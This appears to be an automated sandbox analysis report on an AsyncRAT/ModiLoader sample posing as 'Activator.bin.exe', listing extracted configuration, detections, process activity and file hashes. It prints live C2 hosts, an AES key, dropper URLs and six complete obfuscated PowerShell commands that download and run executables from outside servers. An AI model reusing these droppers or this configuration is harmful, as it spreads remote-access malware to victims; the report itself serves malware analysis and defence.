asyncrat | 9f5e45a8d10dab735e9e6571599fe6bc43c5c0e222339aef793c3e46c2fb7e13

Analysis

max time kernel
11s
max time network
146s
platform
windows10_x64
resource
win10v20201028
submitted
05-11-2020 20:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Activator.bin.exe

Score

10^/10

asyncrat modiloader rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e7RiX

exe.dropper

http://bit.do/e7RiX

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://nicoslag.ru/asdfg.exe

exe.dropper

http://nicoslag.ru/asdfg.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e7Rji

exe.dropper

http://bit.do/e7Rji

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://kfdhsa.ru/asdfg.exe

exe.dropper

http://kfdhsa.ru/asdfg.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e7Rjx

exe.dropper

http://bit.do/e7Rjx

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bratiop.ru/asdfg.exe

exe.dropper

http://bratiop.ru/asdfg.exe

Extracted

Family

asyncrat

Version

0.5.7B

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
anti_detection
false
autorun
false
bdos
false
delay
Default
host
agentttt.ac.ug,agentpurple.ac.ug
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6970
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Contains code to disable Windows Defender 6 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral2/memory/1316-204-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral2/memory/1316-205-0x000000000040616E-mapping.dmp	disable_win_def
behavioral2/memory/3956-215-0x0000000000403BEE-mapping.dmp	disable_win_def
behavioral2/memory/3956-214-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def
C:\Windows\temp\1310bkar.exe	disable_win_def
C:\Windows\Temp\1310bkar.exe	disable_win_def

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/552-403-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/552-406-0x000000000040C76E-mapping.dmp	asyncrat

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4992-324-0x0000000004AE0000-0x0000000004B2D000-memory.dmp	modiloader_stage2

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

keygen.exe

pid process

3884 keygen.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1424 timeout.exe
4184 timeout.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings cmd.exe

pid	process
3884	keygen.exe

pid	process
1424	timeout.exe
4184	timeout.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2100	powershell.exe
2100	powershell.exe
3964	powershell.exe
3964	powershell.exe
4200	powershell.exe
4200	powershell.exe
4384	powershell.exe
4384	powershell.exe
2100	powershell.exe
3964	powershell.exe
4200	powershell.exe
4384	powershell.exe
4200	powershell.exe
2100	powershell.exe
3964	powershell.exe
4796	powershell.exe
4796	powershell.exe
4384	powershell.exe
4972	powershell.exe
4972	powershell.exe
4796	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

keygen.exepowershell.exepowershell.exepowershell.exepowershell.exeAUDIODG.EXEpowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3884	keygen.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	4200	powershell.exe
Token: SeDebugPrivilege	4384	powershell.exe
Token: 33	4580	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4580	AUDIODG.EXE
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeDebugPrivilege	4972	powershell.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

Activator.bin.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exe

description	pid	process	target process
PID 1304 wrote to memory of 2800	1304	Activator.bin.exe	cmd.exe
PID 1304 wrote to memory of 2800	1304	Activator.bin.exe	cmd.exe
PID 1304 wrote to memory of 2800	1304	Activator.bin.exe	cmd.exe
PID 2800 wrote to memory of 3952	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 3952	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 3952	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 2160	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 2160	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 2160	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 3884	2800	cmd.exe	keygen.exe
PID 2800 wrote to memory of 3884	2800	cmd.exe	keygen.exe
PID 2800 wrote to memory of 3884	2800	cmd.exe	keygen.exe
PID 2800 wrote to memory of 1424	2800	cmd.exe	timeout.exe
PID 2800 wrote to memory of 1424	2800	cmd.exe	timeout.exe
PID 2800 wrote to memory of 1424	2800	cmd.exe	timeout.exe
PID 3952 wrote to memory of 2100	3952	mshta.exe	powershell.exe
PID 3952 wrote to memory of 2100	3952	mshta.exe	powershell.exe
PID 3952 wrote to memory of 2100	3952	mshta.exe	powershell.exe
PID 2160 wrote to memory of 3964	2160	mshta.exe	powershell.exe
PID 2160 wrote to memory of 3964	2160	mshta.exe	powershell.exe
PID 2160 wrote to memory of 3964	2160	mshta.exe	powershell.exe
PID 2800 wrote to memory of 1444	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 1444	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 1444	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 4168	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 4168	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 4168	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 4184	2800	cmd.exe	timeout.exe
PID 2800 wrote to memory of 4184	2800	cmd.exe	timeout.exe
PID 2800 wrote to memory of 4184	2800	cmd.exe	timeout.exe
PID 1444 wrote to memory of 4200	1444	mshta.exe	powershell.exe
PID 1444 wrote to memory of 4200	1444	mshta.exe	powershell.exe
PID 1444 wrote to memory of 4200	1444	mshta.exe	powershell.exe
PID 4168 wrote to memory of 4384	4168	mshta.exe	powershell.exe
PID 4168 wrote to memory of 4384	4168	mshta.exe	powershell.exe
PID 4168 wrote to memory of 4384	4168	mshta.exe	powershell.exe
PID 2800 wrote to memory of 4696	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 4696	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 4696	2800	cmd.exe	mshta.exe
PID 4696 wrote to memory of 4796	4696	mshta.exe	powershell.exe
PID 4696 wrote to memory of 4796	4696	mshta.exe	powershell.exe
PID 4696 wrote to memory of 4796	4696	mshta.exe	powershell.exe
PID 2800 wrote to memory of 4864	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 4864	2800	cmd.exe	mshta.exe
PID 2800 wrote to memory of 4864	2800	cmd.exe	mshta.exe
PID 4864 wrote to memory of 4972	4864	mshta.exe	powershell.exe
PID 4864 wrote to memory of 4972	4864	mshta.exe	powershell.exe
PID 4864 wrote to memory of 4972	4864	mshta.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Activator.bin.exe
"C:\Users\Admin\AppData\Local\Temp\Activator.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\Activator.bin.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL imhur $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;imhur pkzwjshtlmgd $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzwjshtlmgd;imhur brvxmhkwft $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JpWA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);brvxmhkwft $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2100
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\m1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2160
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfgtiyleoxj $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfgtiyleoxj rxjawksc $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rxjawksc;cfgtiyleoxj lkhxvdgpjitz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);lkhxvdgpjitz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3964
- - C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\keygen.exe
    keygen.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3884
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:1424
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1444
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL cfpdmyg $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;cfpdmyg pnuqyjbf $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pnuqyjbf;cfpdmyg josedgvxy $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqaQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);josedgvxy $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4200
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\b1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4168
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL pgnfirdewovxsl $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;pgnfirdewovxsl ezosprk $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|ezosprk;pgnfirdewovxsl ctslxmfoz $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);ctslxmfoz $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4384
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:4184
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\b2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4696
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vqaznm $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vqaznm amvlntpxjbs $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|amvlntpxjbs;vqaznm gbxlmur $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JqeA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbxlmur $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4796
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\b2a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4864
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xutrghv $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xutrghv hjlgdycxt $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|hjlgdycxt;xutrghv gbljpredwuxzv $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);gbljpredwuxzv $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4972

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3dc
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MnnxGZrMP0.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Xx5gygzqWC.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\b1.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\b1a.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\b2.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\b2a.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\keygen.exe

MD5
9fcf4896acbfbeda707cf6e13bcb4591

SHA1
a9a7fd9bd4dba4c035ea083a220f5abb5e173eeb

SHA256
d731e223960788a83e35f9e9c3d714ef29a4d447c4fd079cd4ac87c32b269c89

SHA512
90d0bdd3bcaaeb06e07d9a3682f57aa33c6e71a81742512e461a239ddc20cea592b66222779c7587520e5cd95306d370b6984eb0abb6d7650f02ad3529b56669

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\keygen.exe

MD5
9fcf4896acbfbeda707cf6e13bcb4591

SHA1
a9a7fd9bd4dba4c035ea083a220f5abb5e173eeb

SHA256
d731e223960788a83e35f9e9c3d714ef29a4d447c4fd079cd4ac87c32b269c89

SHA512
90d0bdd3bcaaeb06e07d9a3682f57aa33c6e71a81742512e461a239ddc20cea592b66222779c7587520e5cd95306d370b6984eb0abb6d7650f02ad3529b56669

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\m1.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\m1a.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CB7.tmp\start2.bat

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGrytnvbsdf.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGrytnvbsdf.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGrytnvbsdf.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBFtrybcvuyt.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBFtrybcvuyt.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBFtrybcvuyt.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\MnnxGZrMP0.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\MnnxGZrMP0.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\MnnxGZrMP0.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\MnnxGZrMP0.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Xx5gygzqWC.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Xx5gygzqWC.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Xx5gygzqWC.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\hIXTkyPeP8.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\hIXTkyPeP8.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\hIXTkyPeP8.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\kAEuNsJ7Bx.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\kAEuNsJ7Bx.exe

Download Submit
C:\Users\Public\Natso.bat

Download Submit
C:\Users\Public\cdp.exe

Download Submit
C:\Users\Public\cdp.exe

Download Submit
C:\Users\Public\cdp.exe

Download Submit
C:\Users\Public\dmq.exe

Download Submit
C:\Users\Public\dmq.exe

Download Submit
C:\Windows\Temp\1310bkar.exe

MD5
f4b5c1ebf4966256f52c4c4ceae87fb1

SHA1
ca70ec96d1a65cb2a4cbf4db46042275dc75813b

SHA256
88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

SHA512
02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

Download Submit
C:\Windows\temp\1310bkar.exe

MD5
f4b5c1ebf4966256f52c4c4ceae87fb1

SHA1
ca70ec96d1a65cb2a4cbf4db46042275dc75813b

SHA256
88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

SHA512
